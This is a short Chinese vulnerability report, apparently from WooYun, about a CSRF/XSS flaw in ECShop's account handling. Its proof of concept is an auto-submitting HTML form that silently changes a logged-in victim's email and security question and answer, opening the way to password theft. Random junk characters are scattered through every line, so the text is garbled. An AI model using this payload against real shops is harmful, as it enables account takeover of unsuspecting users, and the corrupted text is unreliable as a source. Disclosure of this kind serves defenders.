简要描述:
' }, _- Q1 D) Y; |( t) B! l8 Gecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
- Q( N, I; j! R) [( e" J* ~$ ~/ i' H' o$ \
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
; e$ E9 ]# N$ _$ \8 h& {. G0 U) f! ?0 d
详细说明: `$ r! g0 N& T$ J5 M" p
利用csrf和xss可以突破官方所说的“障碍”/ G9 e9 A* l. Q7 J6 C$ x% c9 L$ u# ]& |5 D$ i
xss版本已经有人说明, ~. ?. P9 Q$ {7 q+ [5 G3 T
这里给出csrf版本
0 F5 y' W, Y! @1 b% V
) m' J! c7 n, \3 a2 n1 L漏洞证明:
7 _" T7 P q1 ~<html>
+ R' M4 g. I1 l$ |0 W<body>9 ~, ?! @ v* r# e; J5 f0 k$ |8 M
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">4 Z# R' K; K+ ]) {( i* \4 F
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">: e0 a+ P* M4 C
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 N9 L0 K6 Z' l<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 V, l* U u, B% }9 G
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">. ~/ ?; O7 J* F9 H
</body>3 z( J2 y$ ^5 ^4 L
<script>
+ b8 e# a4 d9 D% u; I1 ~3 S# Qdocument.forms[0].submit();! F: D9 Q# J; b& f7 d; n; B% r! i
</script>" J0 q: f2 v( W" X& U
</html>
5 J3 G1 I4 o6 I构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失$ P8 n1 y9 ~- G! f% Z" Z
3 `& B& B% X1 J1 M$ R! O
|